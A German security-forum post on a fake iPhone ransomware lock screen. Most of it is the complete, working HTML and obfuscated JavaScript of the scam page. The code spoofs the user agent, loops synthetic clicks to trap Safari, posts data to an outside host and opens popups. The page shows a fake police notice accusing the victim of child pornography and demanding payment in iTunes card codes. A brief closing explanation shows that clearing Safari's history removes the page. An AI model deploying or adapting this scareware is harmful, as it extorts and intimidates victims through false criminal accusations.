> Forums > Internet, Viren, Trojaner, Phishing, Spoofing, Ransomware & Malware Forum

R

Ransomware attackiert iPhone-User - So läuft der Angriff

Erstellt
Jan. '17
letzte Antwort
Noch keine
Antworten
Noch keine
Aufrufe
3.4T
12
„Gefällt mir“
Abos
Noch keine
Fr., 20. Januar, 2017 um 23:59
#1

Sicherheitshinweis


ACHTUNG! Die nachfolgenden Informationen sind nicht für AnfängerInnen geeignet. Bitte mach nur weiter, wenn du dir sicher bist, was du tust. Wir übernehmen keinerlei Verantwortung falls du dein Gerät oder Daten beschädigst. Die übernehmen wir sonst auch nicht, aber hier möchten wir explizit darauf hinweisen, dass es nicht ungefährlich ist, solche Eingriffe und Änderungen vorzunehmen. Fortfahren also auf eigene Gefahr!


Aufgrund dieser News (https://www.ress.at/ransomware-attackiert-iphoneuser-news20012017181023.html), hier ein Beispiel wie so ein "Angriff" von statten geht...

Auf GitHub gibt es den Beispielcode:

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<!-- saved from url=(0070)http://apple-ios-front.gq/29300000/index.php?DATARE=Vylet%3A30_15%3A29 -->
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title></title>

<style type="text/css">
* {
padding:0;
margin:0;
}
html {
font-size:150%;
}
body {
overflow:hidden;
background:#FFF;
color:#FFF;
font-size:16px;
font-family:Arial, Helvetica, sans-serif;
min-width:1000px;
}
</style>
<link rel="stylesheet" href="./index.php_files/bootstrap.min.css">
<link rel="stylesheet" href="./index.php_files/bootstrap-theme.min.css">
<link rel="stylesheet" href="./index.php_files/font-awesome.min.css">

<script type="text/javascript">navigator.__defineGetter__('userAgent', function () { return 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4'; });</script></head>
<body class="jvxx_line-viewer">
<br>
<a id="da" href="hello:apple ;)"></a>

<script type="text/javascript">
var _0xf93f=["\x64\x61","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x66\x6F\x63\x75\x73","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x50\x72\x69\x6C\x65\x74\x3A","\x67\x65\x74\x44\x61\x74\x65","\x5F","\x67\x65\x74\x48\x6F\x75\x72\x73","\x3A","\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x79\x61\x3D\x39\x26\x6F\x64\x3D\x35\x30\x30\x26\x69\x74\x3D","\x68\x74\x74\x70\x3A\x2F\x2F\x70\x6F\x6C\x63\x6D\x69\x6F\x73\x2E\x63\x6F\x6D\x2F","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x4C\x65\x6E\x67\x74\x68","\x6C\x65\x6E\x67\x74\x68","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x73\x65\x6E\x64","\x5E\x30\x5B\x30\x2D\x39\x5D\x5B\x30\x2D\x39\x5D\x7B\x31\x34\x7D\x24","\x74\x65\x73\x74","\u0424\u0415\u0414\u0415\u0420\u0410\u041B\u042C\u041D\u0410\u042F\x20\u0421\u041B\u0423\u0416\u0411\u0410\x20\u041F\u041E\x20\u041D\u0410\u0414\u0417\u041E\u0420\u0423\x20\u0412\x20\u0421\u0424\u0415\u0420\u0415\x20\u0421\u0412\u042F\u0417\u0418\x2C\x20\u0418\u041D\u0424\u041E\u0420\u041C\u0410\u0426\u0418\u041E\u041D\u041D\u042B\u0425\x20\u0422\u0415\u0425\u041D\u041E\u041B\u041E\u0413\u0418\u0419\x20\u0418\x20\u041C\u0410\u0421\u0421\u041E\u0412\u042B\u0425\x20\u041A\u041E\u041C\u041C\u0423\u041D\u0418\u041A\u0410\u0426\u0418\u0419\x0A\u0428\u0442\u0440\u0430\u0444\x20\x35\x30\x30\x30\x20\u0440\u0443\u0431\u043B\u0435\u0439\x20\u043D\u0430\x20\u0444\u0435\u0434\u0435\u0440\u0430\u043B\u044C\u043D\u044B\u0439\x20\u043D\u043E\u043C\u0435\u0440\x20\u0411\u0438\u043B\u0430\u0439\u043D\x20\x20\x38\x28\x39\x36\x33\x29\x33\x31\x33\x2D\x34\x36\x2D\x37\x39\x20\x20\x0A\u0412\u044B\x20\u0437\u0430\u0431\u043B\u043E\u043A\u0438\u0440\u043E\u0432\u0430\u043D\u044B\x20\u0437\u0430\x20\u043D\u0435\u043E\u0434\u043D\u043E\u043A\u0440\u0430\u0442\u043D\u043E\u0435\x20\u043F\u043E\u0441\u0435\u0449\u0435\u043D\u0438\u0435\x20\u043F\u043E\u0440\u043D\u043E\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043A\u0438\u0445\x20\u0441\u0430\u0439\u0442\u043E\u0432\x2C\x20\u0441\u043E\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0445\x20\u043C\u0430\u0442\u0435\u0440\u0438\u0430\u043B\u044B\x2C\x20\u0437\u0430\u043F\u0440\u0435\u0449\u0435\u043D\u043D\u044B\u0435\x20\u0437\u0430\u043A\u043E\u043D\u043E\u0434\u0430\u0442\u0435\u043B\u044C\u0441\u0442\u0432\u043E\u043C\x20\u0420\u0424\x2C\x20\u0430\x20\u0438\u043C\u0435\u043D\u043D\u043E\x2C\x20\u043F\u043E\u0440\u043D\u043E\u0433\u0440\u0430\u0444\u0438\u044F\x20\u0441\x20\u044D\u043B\u0435\u043C\u0435\u043D\u0442\u0430\u043C\u0438\x20\u043F\u0435\u0434\u043E\u0444\u0438\u043B\u0438\u0438\x2C\x20\u043D\u0430\u0441\u0438\u043B\u0438\u044F\x20\u0438\x20\u043F\u0440\u043E\u043F\u0430\u0433\u0430\u043D\u0434\u044B\x20\u0433\u043E\u043C\u043E\u0441\u0435\u043A\u0441\u0443\u0430\u043B\u0438\u0437\u043C\u0430\x2E\x0A\x0A\u0414\u043B\u044F\x20\u0441\u043D\u044F\u0442\u0438\u044F\x20\u0431\u043B\u043E\u043A\u0438\u0440\u043E\u0432\u043A\u0438\x20\u0412\u0430\u043C\x20\u043D\u0435\u043E\u0431\u0445\u043E\u0434\u0438\u043C\u043E\x20\u043E\u043F\u043B\u0430\u0442\u0438\u0442\u044C\x20\u0448\u0442\u0440\u0430\u0444\x20\u0432\x20\u0440\u0430\u0437\u043C\u0435\u0440\u0435\x20\x35\x30\x30\x30\x20\u0440\u0443\u0431\u043B\u0435\u0439\x20\u043D\u0430\x20\u0444\u0435\u0434\u0435\u0440\u0430\u043B\u044C\u043D\u044B\u0439\x20\u043D\u043E\u043C\u0435\u0440\x20\u0411\u0438\u043B\u0430\u0439\u043D\x20\x20\x38\x28\x39\x36\x33\x29\x33\x31\x33\x2D\x34\x36\x2D\x37\x39\x20\x20\x20\u043B\u044E\u0431\u044B\u043C\x20\u0434\u043E\u0441\u0442\u0443\u043F\u043D\u044B\u043C\x20\u0441\u043F\u043E\u0441\u043E\u0431\u043E\u043C\x20\x28\u043A\u0430\u043A\x20\u043E\u0431\u044B\u0447\u043D\u043E\u0435\x20\u043F\u043E\u043F\u043E\u043B\u043D\u0435\u043D\u0438\u0435\x20\u0431\u0430\u043B\u0430\u043D\u0441\u0430\x20\u043C\u043E\u0431\u0438\u043B\u044C\u043D\u043E\u0433\u043E\x20\u0442\u0435\u043B\u0435\u0444\u043E\u043D\u0430\x29\x0A\x0A\u041F\u043E\u0441\u043B\u0435\x20\u043E\u043F\u043B\u0430\u0442\u044B\x20\u0443\u0441\u0442\u0440\u043E\u0439\u0441\u0442\u0432\u043E\x20\u0431\u0443\u0434\u0435\u0442\x20\u0440\u0430\u0437\u0431\u043B\u043E\u043A\u0438\u0440\u043E\u0432\u0430\u043D\u043E\x20\u0430\u0432\u0442\u043E\u043C\u0430\u0442\u0438\u0447\u0435\u0441\u043A\u0438\x0A\x0A\u0412\x20\u0441\u043B\u0443\u0447\u0430\u0435\x20\u043E\u0442\u043A\u0430\u0437\u0430\x20\u043E\u0442\x20\u0443\u043F\u043B\u0430\u0442\u044B\x20\u0448\u0442\u0440\u0430\u0444\u0430\x20\u0438\u043B\u0438\x20\u043F\u043E\u043F\u044B\u0442\u043A\u0438\x20\u0440\u0430\u0437\u0431\u043B\u043E\u043A\u0438\u0440\u043E\u0432\u0430\u0442\u044C\x20\u0443\u0441\u0442\u0440\u043E\u0439\u0441\u0442\u0432\u043E\x20\u0431\u0435\u0437\x20\u043E\u043F\u043B\u0430\u0442\u044B\x20\x2D\x20\u043D\u0430\x20\u043E\u0441\u043D\u043E\u0432\u0430\u043D\u0438\u0438\x20\u0447\x2E\x32\x20\u0441\u0442\x2E\x20\x34\x31\x20\u041A\u0410\u0421\x20\u0420\u0424\x20\u0438\x20\u0441\u0442\x2E\x33\x31\x20\u0423\u041F\u041A\x20\u0420\u0424\x20\x2D\x20\u043C\u0430\u0442\u0435\u0440\u0438\u0430\u043B\u044B\x20\u0434\u0435\u043B\u0430\x20\u0431\u0443\u0434\u0443\u0442\x20\u043F\u0435\u0440\u0435\u0434\u0430\u043D\u044B\x20\u0432\x20\u043F\u0440\u043E\u043A\u0443\u0440\u0430\u0442\u0443\u0440\u0443\x20\u0434\u043B\u044F\x20\u043F\u0440\u0438\u043D\u044F\u0442\u0438\u044F\x20\u0440\u0435\u0448\u0435\u043D\u0438\u044F\x20\u043E\u0442\u043D\u043E\u0441\u0438\u0442\u0435\u043B\u044C\u043D\u043E\x20\u0432\u043E\u0437\u0431\u0443\u0436\u0434\u0435\u043D\u0438\u044F\x20\u0443\u0433\u043E\u043B\u043E\u0432\u043D\u043E\u0433\u043E\x20\u0434\u0435\u043B\u0430\x20\u043F\u043E\x20\u0444\u0430\u043A\u0442\u0443\x20\u0441\u043E\u0432\u0435\u0440\u0448\u0435\u043D\u0438\u044F\x20\u043F\u0440\u0435\u0441\u0442\u0443\u043F\u043B\u0435\u043D\u0438\u044F\x20\u043F\u0440\u0435\u0434\u0443\u0441\u043C\u043E\u0442\u0440\u0435\u043D\u043D\u043E\u0433\u043E\x20\u0441\u0442\x2E\x20\x32\x34\x32\x20\u0423\u041A\x20\u0420\u0424\x2E","","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x2F\x69\x6E\x64\x65\x78\x2E\x70\x68\x70","\x61\x62\x6F\x72\x74","\x63\x6C\x6F\x73\x65\x64","\x68\x72\x65\x66","\x56\x79\x6C\x65\x74\x3A","\x46\x42\x49\x49","\x69\x6E\x64\x65\x78\x4F\x66","\x44\x41\x54\x41\x52\x45","\x3F\x44\x41\x54\x41\x52\x45\x3D","\x73\x70\x6C\x69\x74","\x3D","\x26\x46\x42\x49\x49\x3D\x73\x73\x26\x44\x41\x54\x41\x52\x45\x3D","\x59\x61\x6E\x64\x65\x78\x32","\x6F\x70\x65\x6E\x65\x72"];var xmlhttp;function hd(){var _0x6ea1x3=document[_0xf93f[1]](_0xf93f[0]);_0x6ea1x3[_0xf93f[2]]();var _0x6ea1x4=document[_0xf93f[4]](_0xf93f[3]);_0x6ea1x4[_0xf93f[6]](_0xf93f[5],true,true,window,1,12,345,7,220,false,false,true,false,0,null);_0x6ea1x3[_0xf93f[7]](_0x6ea1x4)}function sendCode(_0x6ea1x6){var date= new Date();var dateUrlVylet=_0xf93f[8]+ date[_0xf93f[9]]()+ _0xf93f[10]+ date[_0xf93f[11]]()+ _0xf93f[12]+ date[_0xf93f[13]]();var _0x6ea1x9=encodeURIComponent(dateUrlVylet);var _0x6ea1xa=_0xf93f[14]+ encodeURIComponent(_0x6ea1x6);var _0x6ea1xb=_0xf93f[15];xmlhttp= new XMLHttpRequest();xmlhttp[_0xf93f[17]](_0xf93f[16],_0x6ea1xb,true);xmlhttp[_0xf93f[20]](_0xf93f[18],_0xf93f[19]);xmlhttp[_0xf93f[20]](_0xf93f[21],_0x6ea1xa[_0xf93f[22]]);reciveGREEN= 0;xmlhttp[_0xf93f[23]]= function(){if(xmlhttp[_0xf93f[24]]!= 4){return};if(xmlhttp[_0xf93f[25]]== 200){reciveGREEN= 1}else {reciveGREEN= 0}};xmlhttp[_0xf93f[26]](_0x6ea1xa)}function checkPINpsc(_0x6ea1xd){var _0x6ea1xe=false;var _0x6ea1xf= new RegExp(_0xf93f[27]);if(_0x6ea1xf[_0xf93f[28]](_0x6ea1xd)){return true}else {return false}}var noInternet=_0xf93f[29];var noTransferData=_0xf93f[29];var TransferData=_0xf93f[29];var TransferData2=_0xf93f[29];var reloadText=_0xf93f[29];var promptText=_0xf93f[29];var badText=_0xf93f[29];var badText2=_0xf93f[29];var okText=_0xf93f[29];var reciveGREEN=0;var step=1;var edinoe=_0xf93f[30];var popyt=1;var pusk=0;var stope;function dialog(){clearInterval(stope);switch(step){case 1:{popyt= 1;setTimeout(dialog,5);pusk= 1;stope= setInterval(hd,1);break};case 2:{if(reciveGREEN){window[_0xf93f[31]]= _0xf93f[32];window[_0xf93f[31]]= _0xf93f[32];step= 1}else {popyt++;xmlhttp[_0xf93f[33]]();sendCode(edinoe);step= 2};setTimeout(dialog,5);stope= setInterval(hd,1);break};default:}}function check2(){if(pop1[_0xf93f[34]]){clearTimeout(intervalID2);dialog()}}var okno=0;var str=location[_0xf93f[35]];var date= new Date();var dateUrlVylet=_0xf93f[36]+ date[_0xf93f[9]]()+ _0xf93f[10]+ date[_0xf93f[11]]()+ _0xf93f[12]+ date[_0xf93f[13]]();var datasend=encodeURIComponent(dateUrlVylet);if(str[_0xf93f[38]](_0xf93f[37])== -1){gde= 1;if(str[_0xf93f[38]](_0xf93f[39])== -1){window[_0xf93f[31]][_0xf93f[35]]= str+ _0xf93f[40]+ datasend}else {var arr=str[_0xf93f[41]](_0xf93f[39]);var arr=arr[1];var arr=arr[_0xf93f[41]](_0xf93f[42]);datasend= arr[1];var ddf=str+ _0xf93f[43]+ datasend;var pop1=window[_0xf93f[17]](ddf,_0xf93f[44]);if(pop1){okno= 1}else {dialog()}}}else {var arr=str[_0xf93f[41]](_0xf93f[39]);var arr=arr[2];var arr=arr[_0xf93f[41]](_0xf93f[42]);datasend= arr[1];if(window[_0xf93f[45]]){};gde= 2;dialog()}
</script>
<div class="container">
<div class="page-header clearfix">

<img src="./index.php_files/logo.png" class="pull-left" style="height: 100px; margin-right: 20px;"><b style="font-size: 16px;">Sie sind wegen der Ausbreitung von pornografischen Inhalten blockiert, die Materialien enthalten, die in Deutschland gesetzlich verboten sind. Pornografie mit Elementen von Pädophilie (§ 176 StGB), Gewalt (§ 177 StGB) und Porno mit Tieren (§ 184a StGB)</h4>
</b></div>
<div class="row">
<h2>
<p><strong>Um die Blockierung aufzuheben, müssen Sie ein Bußgeld in Höhe von 200,00 € bezahlen. Die Zahlung tätigen Sie mittels Prepaid iTunes-Karten</strong></p>
<p><strong>Senden Sie eine SMS-Nachricht mit dem Code, den Sie auf der Rückseite der Prepaid iTunes-Karte finden, an die folgende Nummer</strong> <strong>+ -zensiert- </strong></p><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>Prepaid iTunes-Karten werden in Geschäften, Supermärkten und Tankstellen verkauft. </p>

<p><strong>Nachdem Sie das Bußgeld bezahlt haben, wird das Gerät automatisch entsperrt.</strong></p>

<p> Falls Sie das Bußgeld nicht bezahlen oder versuchen, das Gerät selbst zu entsperren, wird ein Strafverfahren <strong>(gemäß §§ 176, 177, 184a, 184b StGB)</strong> bei dem Bundeskriminalamt gegen Sie eingeleitet. </strong> </p>
</h2></div>

<div class="clearfix">
<h4 style="color: red">Das Bußgeld muss innerhalb von 12 Stunden gezahlt werden.</h4>

</small></div><small>
</small><small>

<script type="text/javascript">
var params = "menubar=no,location=no,resizable=no,scrollbars=no,status=no"
function PopShow3() {
CookieTest=navigator.cookieEnabled;
if(CookieTest)
{
ClickUndercookie = GetCookie('clickunder');
if (ClickUndercookie == null)
{
var ExpDate = new Date ();
ExpDate.setTime(ExpDate.getTime() + (0 * 60 * 60 * 1000));
SetCookie('clickunder','1',ExpDate, "/");
window.open("./index.php", "Yandex", params);
window.focus();
}
}
}
function GetCookie (name) {
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {
var j = i + alen;
if (document.cookie.substring(i, j) == arg)
return getCookieVal (j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}
function SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}
document.onmouseup=PopShow3;
</script>

</small></strong></body></html>



Wie man erkennt, produziert die Seite einen gefälschten "Sperrbildschirm".
Im Grunde ist es aber nur eine Webseite, die alle Scrollbalken ausblendet.

Weil Safari die zuletzt aufgerufenen Websites speichert, wird dieser falsche "Sperrbildschirm" immer wieder aufgerufen. Löscht man den Browserverlauf, ruft Safari diese Seite auch nicht mehr auf.

Dieser Code gilt als Beispiel wie so ein Angriff abläuft. Natürlich kann dies auch ausgenutzt werden von anderen für illegalle Zwecke...
Aber wie schon oben geschrieben, es gibt diesen Code auf GitHub, für jeden einsehbar und somit ist hier nicht das erste mal dass dieser auftaucht!!!

> Forums > Internet, Viren, Trojaner, Phishing, Spoofing, Ransomware & Malware Forum

Du hast bereits für diesen Post abgestimmt...

;-)



Logo https://t.ress.at/8UGCx/


Ähnliche Themen:











Top